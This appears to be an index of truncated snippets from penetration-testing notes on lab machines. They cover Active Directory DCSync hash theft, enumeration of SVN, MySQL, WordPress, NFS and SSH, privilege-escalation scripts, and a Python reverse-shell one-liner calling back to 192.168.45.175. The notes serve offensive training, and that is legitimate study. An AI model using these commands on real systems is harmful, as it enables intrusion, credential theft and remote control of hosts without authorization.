Host entries: 10.10.11.202 sequel.htb dc.sequel.htb If Active Directory => NTP Synchronization with the domain controller. Content SMB Enumeration MSSQL Server Procedures Searching MSS...
DCSync Attack Another way to achieve persistence in an Active Directory infrastructure is to steal the password hashes for all administrative users in the domain. To do this, we could move lateral...
Enumeration commands svn ls svn://10.10.10.203 #list svn log svn://10.10.10.203 #Commit history svn checkout svn://10.10.10.203 #Download the repository svn up -r 2 #Go to revision 2 inside the ch...
Connection Common command to connect to MariaDB and MySQL databases (avoid -p if you want to be prompted for the password): mysql -h 10.129.5.43 -u root -p'th1s!smypassw0rd' MySQL Basic Commands: ...
Default paths: index.php license.txt contains useful information such as the installed WordPress version. wp-activate.php is used for the email activation process when setting up a new WordP...
LinPeas We can use linpeas on UNIX derivatives such as Linux. ./linpeas.sh | tee output.txt Unix_privesc_check We can use unix_privesc_check on UNIX derivatives such as Linux. The script support...
Recursively find a string: # Find ETSCTF in every file under the current directory find . -type f -exec grep -H 'ETSCTF' {} \; 2>/dev/null # Identify any file (not directory) modified in the las...
Enumeration Cipher Algorithms supported: nmap -p22 10.10.1.3 --script ssh2-enum-algos Public key from ssh server: nmap -p22 10.10.1.3 --script ssh-hostkey --script-args=ssh_hostkey=full Review i...
NMAP Scan port and info on NFS nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.181.201 ... 111/tcp open rpcbind | nfs-showmount: |_ /var * | nfs-statfs: | Filesystem 1K-blocks Us...
Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.175",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),...